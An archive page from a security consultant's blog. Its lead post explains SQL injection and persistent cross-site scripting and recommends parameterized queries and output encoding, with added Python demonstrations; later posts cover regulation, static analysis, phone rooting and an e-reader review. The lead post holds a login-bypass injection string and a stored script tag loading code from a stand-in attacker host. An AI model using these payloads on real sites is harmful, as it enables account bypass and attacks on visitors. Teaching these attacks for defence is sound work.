SQL Injection and Persistent Cross Site Scripting

January 5th, 2012

A news article came through my twitter feed this morning about a new SQL Injection attack that has affected over 1M web sites:

http://www.net-security.org/secworld.php?id=12169

The attack inserts a malicious JavaScript tag into your page redirecting your users to the attacker’s site. This is probably just semantics, but they are missing another vulnerability here: persistent cross site scripting.

For those not aware of what SQL Injection is, this vulnerability occurs when unvalidated data is mixed with SQL logic to change the nature of a SQL query. That may be a little confusing, so here’s an example. Let’s say you have a login page that has two text boxes: one for a username and one for a password. When the user clicks submit, the information is put into a SQL query to see if the user exists:

SELECT username FROM users WHERE username='username' AND password='password';

That looks pretty simple. If I put "eric" as the username and "1234" as the password, the query looks like:

SELECT username FROM users WHERE username='eric' AND password='1234';

But what if I put "1234' or '1'='1" in the password field?

SELECT username FROM users WHERE username='username' AND password='1234' or '1'='1';

For the non-SQL folks, that will retrieve every record in the users table, because it’s asking "give me all rows where username=x and password=x, or where 1=1". Since AND binds tighter than OR, the condition is really "(username matches and password matches) OR 1=1", and 1 will always equal 1, so every row is returned. In the case of this attack, attackers used the same trick to insert a script tag into the database, and that tag eventually gets inserted into the HTML of the site. That is where persistent cross site scripting comes in.

Cross site scripting (or XSS for short) is where untrusted/unvalidated data is inserted into the page. There are three main types of XSS, but let’s focus on the persistent flavor. Persistent XSS occurs when data is retrieved from the database and inserted into the page without being validated and encoded. What’s the problem with that? This is always a hard pill for developers to swallow, but your database is not a trusted store for data. See the above example for why!

To demonstrate persistent XSS, let’s say that the content of a blog article is stored in your application’s database. You want to post that article on your blog, so that data is pulled out of the database and inserted into the page. The article content looks like this:

The Auburn Tigers successfully routed the University of Virginia in the Chick-fil-a bowl! The Tigers will graduate very few seniors, so let’s hope for a better season next year.

Inserting that directly into a page doesn’t look bad, but if I use the SQL Injection attack above to edit the content of this article I could attack your users:

The Auburn Tigers successfully routed the University of Virginia in the Chick-fil-a bowl! The Tigers will graduate very few seniors, so let’s hope for a better season next year. <script src="http://evilhacker.ru/youjustgothacked.js"></script>

When any user visits the page with the article, the JavaScript from evilhacker.ru will execute in that user’s browser, with the same access to the page and its cookies as the site’s own scripts. This could do many things, but the most popular is redirecting to a malicious site where the attacker has control over the entire session.

So the SQL Injection sets up the attack, but the persistent XSS is actually the vulnerability being exploited here. If the persistent XSS were fixed, there would be no redirect, even with the tampered content sitting in the database. SQL Injection is still a serious vulnerability (#1 on the OWASP Top 10) that should be fixed immediately.

So how do you fix these vulnerabilities? I can write entire blog posts for these attacks…but here’s a quick explanation.

First, a word about input validation. NEVER trust data that comes from a source you don’t control. Data from a user, a web service, a database, or an external system is outside the sphere of influence of the application, so VALIDATE the data.

The best way to fix SQL Injection is to use parameterized queries. Parameterization is basically putting placeholders into your SQL query and then letting your platform bind the data for you, so the query’s structure is fixed before any user data touches it. This will fix the vast majority of SQL Injection issues. Every platform is a little different, so try googling "parameterizing SQL queries" for your specific language to get an example.
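To make the login example above concrete, here is an added example (not code from the original post) in Python using the standard library’s sqlite3 module. The users table, its rows and the `vulnerable_login`/`parameterized_login` function names are all constructed for this illustration. The vulnerable version pastes the username and password into the SQL text, exactly as the query above does; the parameterized version uses `?` placeholders and hands the values to the driver separately. Feeding both the post’s `1234' or '1'='1` password shows the difference: the first returns every user, the second returns nothing.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: an in-memory users table with three rows.
    # Passwords are stored in plain text only to mirror the post's query;
    # a real application would store a salted hash instead.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("eric", "1234"), ("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Untrusted input is mixed directly into the SQL logic. A quote inside the
    # password ends the string literal early and the rest becomes SQL.
    query = (
        "SELECT username FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return [row[0] for row in conn.execute(query)]


def parameterized_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Placeholders keep the SQL structure fixed; the driver binds the values as
    # data, so quotes inside the input can never change what the query does.
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(query, (username, password))]


if __name__ == "__main__":
    db = make_db()
    payload = "1234' or '1'='1"  # the post's example password
    print("normal login, vulnerable:     ", vulnerable_login(db, "eric", "1234"))
    print("normal login, parameterized:  ", parameterized_login(db, "eric", "1234"))
    print("injected password, vulnerable:", vulnerable_login(db, "username", payload))
    print("injected password, parameterized:", parameterized_login(db, "username", payload))
```

The parameterized query is not "escaping done for you": the values never become part of the SQL text at all, which is why it holds up regardless of what characters the input contains.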

For cross site scripting, the best fix is output encoding. If the data is being inserted into HTML, use HTML encoding. This will encode the characters that have meaning to the browser (such as <, >, &, and quotes), so a stored <script> tag is displayed as text rather than interpreted as markup. Not all encoding libraries are good enough. Check out the OWASP ESAPI or the Anti-XSS Library from Microsoft if you’re using .NET.
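Here is an added example (again not the original post’s code) of the persistent XSS scenario from the blog-article discussion above, and of the HTML-encoding fix, in Python. The articles table, the `render_unsafe`/`render_encoded`/`has_script_tag` names and the tampered article body are constructed for this illustration; the script URL is the one the post uses. The tampered body is read back from the database and rendered two ways: pasted straight into the page, and passed through `html.escape` first.

```python
import html
import sqlite3

# Constructed sample: the post's article body after the SQL injection has
# appended a script tag to it.
TAMPERED_BODY = (
    "The Auburn Tigers successfully routed the University of Virginia in the "
    "Chick-fil-a bowl! The Tigers will graduate very few seniors, so let's hope "
    'for a better season next year. <script src="http://evilhacker.ru/youjustgothacked.js"></script>'
)


def make_db() -> sqlite3.Connection:
    # In-memory articles table holding the tampered row.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, body TEXT)")
    conn.execute("INSERT INTO articles (id, body) VALUES (?, ?)", (1, TAMPERED_BODY))
    return conn


def fetch_article(conn: sqlite3.Connection, article_id: int) -> str:
    # Data coming out of the database is untrusted input, just like form data.
    row = conn.execute("SELECT body FROM articles WHERE id=?", (article_id,)).fetchone()
    return row[0] if row else ""


def render_unsafe(body: str) -> str:
    # Trusts the database: stored markup is emitted as-is and the browser runs it.
    return f"<article>{body}</article>"


def render_encoded(body: str) -> str:
    # Treats the stored text as data. html.escape turns & < > " ' into entities,
    # so the browser displays the tag literally instead of executing it.
    return f"<article>{html.escape(body, quote=True)}</article>"


def has_script_tag(rendered: str) -> bool:
    # Simple check used to compare the two renderings: does a live tag survive?
    return "<script" in rendered.lower()


if __name__ == "__main__":
    db = make_db()
    body = fetch_article(db, 1)
    print("unsafe: ", render_unsafe(body))
    print("encoded:", render_encoded(body))
    print("script tag survives unsafe render: ", has_script_tag(render_unsafe(body)))
    print("script tag survives encoded render:", has_script_tag(render_encoded(body)))
```

Note that `html.escape` is the right tool only when the value lands in HTML body text or a quoted attribute; data inserted into a JavaScript block, a URL, or CSS needs the encoder for that context, which is the gap the OWASP and Microsoft libraries mentioned above are designed to cover.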

IT Security

Regulation and Competitiveness

October 8th, 2011

I recently read an article quoting some "cyber security experts" discussing off-shoring and cyber security. Part of the article says that the government should not regulate software security because this will increase the cost of software and push more development overseas. There is some logic to this argument, but it’s the same excuse I hear from software developers who don’t want to fix their code. The argument being made is "I can give you crappy software at a price that is competitive with off-shored labor, or we can give you good code for a price that’s so large it will make you be okay with off-shoring".

I’m not a fan of government regulation, but something has to give. For decades the general public has been acting as beta testers while software vendors work the kinks out of their software. The obvious downside is weekly security updates from Microsoft, malware that can take over a computer in a single click, and the building of zombie computer armies. While we are seeing some companies get better about writing secure code, it’s not industry wide. Security remains an obstacle to getting to market quickly and an afterthought once in the market. This mentality will continue until something changes.

The Payment Card Industry Data Security Standard (PCI DSS) is a great example of self regulation. PCI DSS is not perfect by any means, ask Heartland Payment Systems, but it forced some companies to make security a priority. Even if the priority is just to pass an audit, this is still positive yardage for their customers. The private and public sectors need something like PCI DSS.

The answer could be self regulation: a consortium of software vendors agreeing to a security standard and then being able to put the group’s logo on their software. Will this happen? Probably not. Humans usually don’t change until there is a large enough event to make the change happen. I would rather not wait around for that event, so government regulation (or the threat of government regulation) is the next best thing.

A part of whatever regulation comes about should include stipulations for supply chain risk management. Code coming from off-shored development shops is sub par functionally speaking and even worse for security. If we are going to make software secure, it has to start at the requirements and be a part of design, coding, testing, and production. Who writes the code or where it is written should not matter. Developing software without security is writing crappy code, plain and simple.

If this makes the cost of software rise, so be it. I would much rather pay more for software and not have to worry about clicking a link that will take over my computer, steal my bank password, and then make me spend hours on the phone trying to get my money back.

Software

Some Light on False Positives and Static Analysis

July 9th, 2011

I’ve noticed my blog has been getting a lot of traffic lately regarding false positives and custom rules for Fortify. Full disclosure: I am a Fortify consultant. The number one complaint I hear about Fortify’s static analysis product (Fortify SCA) is that it produces too many false positives. To understand why this happens, some context is needed on Fortify’s design and purpose.

When the cavemen wrote code, they would use manual code review to look for bugs and security holes. There is a place for manual code review, but it’s costly and the effectiveness depends on the security education level of the reviewers. Manual code review usually leads to a high false negative rate, especially in complex applications. To make sure everyone is on the same page here, a false positive is where an issue is found that is really not an issue. A false negative is where an issue is missed, leaving a vulnerability in the code.

Fortify SCA was created to help automate the manual code review process. SCA looks through your source code and finds possible vulnerabilities…emphasis on possible. SCA errs on the side of reducing false negatives. The corollary to that is we produce more false positives. We do that because we would rather produce some false positives to avoid missing real issues. We do our best to understand the application, but let’s face it: static analysis is just one algorithm scanning another. There’s no way for ANY static analysis software to not produce false positives.

I also encounter many developers calling real vulnerabilities false positives because they don’t fully understand the finding. I recently received an email from a developer saying SCA found hundreds of persistent cross site scripting issues and that they were all false positives. He was convinced that since they do input validation, trusting the database was not a problem. We talked some about why the database is not a trusted source and he got the big picture.

For the most part, SCA does a decent job of reducing false positives. Many times the reviewers don’t understand the vulnerability or SCA’s criticality is too high for the given scenario. When it comes down to it, SCA is just a way of identifying potential issues. It’s up to the reviewers to decide how they want to handle the output.

If you’re having problems with Fortify, send an email to support@fortify.com. Our support group is fantastic, so give that a go first. If you need help integrating Fortify into your SDLC, contact your Fortify rep to get a consultant on site.

Software

.gov For Sale, Lightly Used

January 21st, 2011

So this article made my Friday! I tracked down the actual site where the sites are for sale. All joking aside, this is serious. These sites are trusted by a large number of people, especially the Army sites. Those sites give attackers direct access to DoD internal networks. This just underscores the importance of application security and how much work we have ahead of us.

IT Security

Upgrading T-Mobile Vibrant to Froyo

January 15th, 2011

I bought a T-Mobile Vibrant (Samsung Galaxy S) in July and I’ve been really happy with it. The only downside was that it had Android 2.1 (Éclair); I was hoping for 2.2 (Froyo). Today, I read an article saying that Samsung was pressuring T-Mobile to not upgrade Vibrants over the air with Froyo so that people will upgrade to other Samsung phones. Oh, I don’t think so. I spent a lot of money on this phone and I will not let some no-talent-ass-clowns at Samsung/T-Mobile keep me from the Froyo goodness.

So, I rooted my phone and installed the Eugene Ginger Clone 2.2 ROM. It’s Froyo with a Ginger look and feel. Very, very, very nice. This was my first attempt at rooting my phone or using a ROM. Here’s how I did it:

1. Root the phone. I spent some time working with the SuperOneClick app from XDA, but couldn’t get it to work. For the Vibrant it would involve toggling USB Debugging multiple times and sacrificing a chicken. I found this post that worked like a champ…much easier. When the phone finished booting, I had the SuperUser app and everything worked great.

2. Back Up the Phone. Now that I had root, I used Titanium Backup from the Google Market to make a backup of the phone. This came in helpful after I installed the ROM, since I had to reinstall all of my apps.

3. Install ROM Manager. To install a new ROM, you need to do a few things. First, download the ROM Manager app from the Market. After installing, install the Clockwork Recovery. Before doing this, make sure you have deleted the update.zip file from step one. If you don’t, then Clockwork Recovery will not be installed.

4. Download a ROM. At this point, you can use any ROM you want. I chose the Eugene Ginger Clone R2 ROM because I wanted Froyo and I thought the Ginger interface looked cool. You can download the ROM here. After downloading, connect your phone to a computer and transfer the ROM zip onto the internal storage.

5. Install the ROM. Open ROM Manager, and then choose install ROM from SD. Choose the ROM you want to install, and then click go. It will automatically reboot your phone and the new ROM will install. Voila!

It took me a few hours to do this, but it would have been much quicker had I not bothered with the SuperOneClick app. Happy rooting! Oh, and I’m not responsible if you brick your phone…

Software

More Hours != More Features

January 14th, 2011

I laughed my head off when I read this post on Slashdot this morning:

"My current boss asked me what I thought of asking all employees to work 10-11 hour days until the company is profitable. He read something from Joel Spolsky that said the best way to get new customers is to add new features. Anyways, we are a startup with almost a year live. None of the employees have ownership/stock and all are salary. Salaries are at normal industry rates. What should I say to him when we talk about this again?"

My first question would be, has this manager ever developed software? In my experience, developers write code in spurts. When writing code, I’m usually not going at it for 8 hours straight. Usually after my second cup of coffee I throw on the headphones and plow through some code. More coffee and some reflection about more important things (Auburn winning the National Championship for example), then plow through some more code. Honestly, I write more code when I don’t feel like I have to be writing code. There have been plenty of times I would be in bed, awake because I’ve got some implementation problem stuck in my head. I would get up, grab the laptop, and work when I didn’t have to because it was fun. That’s why we write code: it’s fun.

Making people sit at a desk for 10-11 hours straight just because the boss says so is not fun. If you want more out of your developers, find out what motivates them. Stock options, better perks at work, an Xbox in one of the spare cubes. If you create an atmosphere where people are happy and creative, then you can get good results out of them. It works for Google…

Usually the next argument is something like how much money Google has and that they can afford to let their employees prance around. There is some truth to this, but only some. If you’re going to drive your developers like slaves, give them some stock options. Make them feel like their work will pay off. If this guy wants to stick to just salary, then you will need to find other ways to motivate the developers.

Software

Building a Cyber Army

January 10th, 2011

I recently saw an article about Estonia’s efforts to build a volunteer cyber army. Very cool idea. After being attacked and seeing how it affected their government, I could see why their citizens with security backgrounds would be willing to get involved. The article poses the question of whether this could work in the US. The article leans toward no, but I would say yes.

It is true that many techie types are suspicious of government, but I believe you could find a core group of people who would be willing to volunteer. They could form a new reserve service under USCYBERCOM using the same model they have for the reserves now: train one weekend a month and be ready if needed. One caveat, no required PT! That would likely be a deal breaker for many. Hacking is a couch sport, so being able to run 3 miles or do 100 pushups doesn’t help. Multitasking skills, such as attacking targets while eating Cheetos and watching Family Guy, would be a better fit.

On another note, I think this line of progress will lead to a large swell in the size of the security community. When software development was young, you couldn’t just pluck some guy off the street and have him writing code in a couple of weeks. Now, IDEs and frameworks have matured so much that you can teach monkeys how to write code. Over time, the tools used for attacking/protecting targets will get better. You will still need good people planning things, but you will see more worker bees with less experience/education in security actually doing the work.

IT Security

Code For America

January 5th, 2011

I was reading an article this week in Fast Company called How an Army of Techies Is Taking on City Hall about a new non-profit called "Code For America". It’s a similar model to Teach For America, where graduating college seniors work as teachers in poor neighborhoods. The focus is writing software for municipal governments so that citizens get more bang for their tax bucks. This is a fantastic idea and I applaud their founder, Jennifer Pahlka.

In the article they allude to sharing code between cities. Code sharing is always beneficial, but thinking about graduating seniors writing and sharing code makes me think security nightmare. Only a handful of colleges are doing a decent job of educating future developers on writing secure code. I hope that Mrs. Pahlka has some security expertise lined up…

IT Security

Apps to Hack

August 31st, 2010

Great post to bookmark…this guy has a great list of sites out there that you can practice on.

http://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/

Hack away.

IT Security

Barnes and Noble Nook Review

February 27th, 2010

A few weeks ago I received an American Express gift card at work and I set out to blow the money. I had been thinking about getting an ebook reader for a few months, but didn’t want to spend the money because I’m not really an early adopter. Since this was someone else’s money, I decided to take the plunge. I spent a few weeks weighing the different ebook reader offerings. I looked at the Kindle 2, the Kindle DX, the Sony readers, and the Barnes and Noble Nook. Ultimately I ended up buying the Nook by Barnes and Noble, and here’s why.

I was attracted to the Kindle early on, but about the time I was looking was when they took a bunch of books out of their ebook store in a power play against Macmillan Publishers. I don’t like that kind of instability, so that was an instant con. B&N is a brick and mortar store with more leverage, so I don’t think this type of crap will happen with them. I also didn’t like the fact that you had to buy books from Amazon in their proprietary format. This Apple-like behavior was a real turn off (notice the iPad was not considered). B&N has more ebooks, so this decision was easy for me.

Pros

  • Runs on Android: I’m a big fan of Google’s Android OS, so this was a big pro for me. Even though the Nook does not currently have apps, it likely will in the future. I can then write more apps to extend what I can do with my e-reader.
  • Can Lend Books: Something the Nook offers that other readers do not is the ability to lend books to other Nook users to read. I am constantly borrowing/loaning books from friends and family, so this is a cool feature. I should be able to loan it to more than one person and for more than two weeks, but 2 weeks is better than nothing. I know they want to make more money, but come on…
  • Great Battery Life: The battery life is not as good as the Kindle because of the color touch screen, but it has been fine for me. I usually get around 5 days of battery life with heavy usage.
  • PDF Support: The PDF support so far has been good. Granted the e-reader is not the best way to keep reference material, but reading PDFs has been fine. Even my technical books have looked good. More than likely I will still buy hardback technology books and read the rest on the Nook.
  • E-Pub Support: E-Pub support is a huge pro. You can get E-Pub books in a lot of different places, so I don’t have to just get books from B&N.

Cons

  • Advertising: Why is this a con? I was in an airport last week and I had 5 people ask me "is that a Kindle?" I had to explain to them that it was a Nook from B&N. Amazon has gained the name recognition, so B&N needs to step it up a notch. I think that the Nook is a superior reader, so they need to advertise that. It’s in everyone’s best interest, Nook customers’ and B&N’s, for the community to grow.
  • Lack of Backing from B&N: This is speculation on my part, but the Nook seems like an experiment by B&N and it does not yet have the full backing of the company. The reason why I say this is that it seems like they are not ordering enough Nook readers and accessories to meet the demand. I decided to buy the Nook, but they were not available until early February so I had to wait. When I made the order, I also purchased the Neoprene sleeve that they offer. I lost that sleeve in the airport last week and needed to purchase another one. They are sold out and will not have more until April! If B&N wants to really push this product they need to get behind it. The lack of inventory is not encouraging. I’m envisioning a small room in B&N HQ with a few shelves of accessories and readers with a staff of 2 people for order fulfillment. I hope I’m wrong…

All in all, I love my Nook. I can download ebooks while on the road with the included AT&T wireless. I haven’t tried out the periodical subscriptions yet, but likely will soon. I still have some gift card money, so I will be loading up the Nook with more ebooks.

Tech